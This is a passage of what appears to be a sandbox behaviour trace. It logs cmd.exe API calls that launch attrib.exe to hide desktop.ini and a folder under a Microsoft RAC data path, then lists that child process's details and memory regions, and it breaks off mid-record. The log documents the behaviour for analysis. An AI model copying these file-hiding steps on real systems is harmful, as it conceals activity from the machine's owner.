lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.917] _close (_FileHandle=4) returned 0 [0119.917] FindNextFileW (in: hFindFile=0x21e6b8, lpFindFileData=0x12ee40 | out: lpFindFileData=0x12ee40) returned 0 [0119.918] GetLastError () returned 0x12 [0119.918] FindClose (in: hFindFile=0x21e6b8 | out: hFindFile=0x21e6b8) returned 1 [0119.918] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0119.920] _close (_FileHandle=3) returned 0 [0119.920] GetConsoleTitleW (in: lpConsoleTitle=0x12f278, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.921] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.921] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.921] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.921] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.921] GetLastError () returned 0x2 [0119.921] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.921] GetLastError () returned 0x2 [0119.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0x21e6b8 [0119.921] FindClose (in: hFindFile=0x21e6b8 | out: hFindFile=0x21e6b8) returned 1 [0119.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.922] GetLastError () returned 0x2 [0119.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0x21e6b8 [0119.922] FindClose (in: hFindFile=0x21e6b8 | out: hFindFile=0x21e6b8) returned 1 [0119.922] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.922] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.922] GetConsoleTitleW (in: lpConsoleTitle=0x12f00c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.922] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ee94, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12ef5c | out: lpAttributeList=0x12ee94, lpSize=0x12ef5c) returned 1 [0119.922] UpdateProcThreadAttribute (in: lpAttributeList=0x12ee94, dwFlags=0x0, Attribute=0x60001, lpValue=0x12ef54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ee94, lpPreviousValue=0x0) returned 1 [0119.922] GetStartupInfoW (in: lpStartupInfo=0x12ee50 | out: lpStartupInfo=0x12ee50*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0119.922] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0119.922] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12eef0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ef3c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", lpProcessInformation=0x12ef3c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xf6c, dwThreadId=0xf70)) returned 1 [0119.931] CloseHandle (hObject=0x50) returned 1 [0119.931] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0119.931] GetEnvironmentStringsW () returned 0x222dd0* [0119.931] FreeEnvironmentStringsW (penv=0x222dd0) returned 1 [0119.931] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0119.968] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12ee30 | out: lpExitCode=0x12ee30*=0x0) returned 1 [0119.968] CloseHandle (hObject=0x4c) returned 1 [0119.968] _vsnwprintf (in: _Buffer=0x12ef78, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ee3c | out: _Buffer="00000000") returned 8 [0119.968] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0119.968] GetEnvironmentStringsW () returned 0x222dd0* [0119.968] FreeEnvironmentStringsW (penv=0x222dd0) returned 1 [0119.968] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0119.968] GetEnvironmentStringsW () returned 0x222dd0* [0119.969] FreeEnvironmentStringsW (penv=0x222dd0) returned 1 [0119.969] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ee94 | out: lpAttributeList=0x12ee94) [0119.969] GetConsoleTitleW (in: lpConsoleTitle=0x12f278, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.969] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.969] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.969] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.969] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.969] GetLastError () returned 0x2 [0119.969] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.969] GetLastError () returned 0x2 [0119.969] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0x21e6b8 [0119.969] FindClose (in: hFindFile=0x21e6b8 | out: hFindFile=0x21e6b8) returned 1 [0119.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.970] GetLastError () returned 0x2 [0119.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0x21e6b8 [0119.970] FindClose (in: hFindFile=0x21e6b8 | out: hFindFile=0x21e6b8) returned 1 [0119.970] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.970] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.970] GetConsoleTitleW (in: lpConsoleTitle=0x12f00c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.970] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ee94, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12ef5c | out: lpAttributeList=0x12ee94, lpSize=0x12ef5c) returned 1 [0119.970] UpdateProcThreadAttribute (in: lpAttributeList=0x12ee94, dwFlags=0x0, Attribute=0x60001, lpValue=0x12ef54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ee94, lpPreviousValue=0x0) returned 1 [0119.970] GetStartupInfoW (in: lpStartupInfo=0x12ee50 | out: lpStartupInfo=0x12ee50*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0119.970] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0119.970] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12eef0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ef3c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"", lpProcessInformation=0x12ef3c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf74, dwThreadId=0xf78)) returned 1 [0119.972] CloseHandle (hObject=0x4c) returned 1 [0119.972] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0119.972] GetEnvironmentStringsW () returned 0x223808* [0119.972] FreeEnvironmentStringsW (penv=0x223808) returned 1 [0119.972] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0120.216] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12ee30 | out: lpExitCode=0x12ee30*=0x0) returned 1 [0120.216] CloseHandle (hObject=0x50) returned 1 [0120.216] _vsnwprintf (in: _Buffer=0x12ef78, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ee3c | out: _Buffer="00000000") returned 8 [0120.216] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0120.216] GetEnvironmentStringsW () returned 0x223808* [0120.216] FreeEnvironmentStringsW (penv=0x223808) returned 1 [0120.216] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0120.216] GetEnvironmentStringsW () returned 0x223808* [0120.216] FreeEnvironmentStringsW (penv=0x223808) returned 1 [0120.216] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ee94 | out: lpAttributeList=0x12ee94) [0120.216] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.216] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.217] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.217] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.217] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.217] SetConsoleInputExeNameW () returned 0x1 [0120.217] GetConsoleOutputCP () returned 0x1b5 [0120.217] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.217] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.217] exit (_Code=0) Process: id = "69" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166a0" os_pid = "0xf64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "68" os_parent_pid = "0xf3c" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9436 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9437 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9438 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9439 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9440 start_va = 0x230000 end_va = 0x236fff entry_point = 0x230000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 9441 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9442 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9443 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9444 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 9445 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9446 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9447 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9448 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9449 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 9450 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 9451 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 9452 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9453 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9454 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: 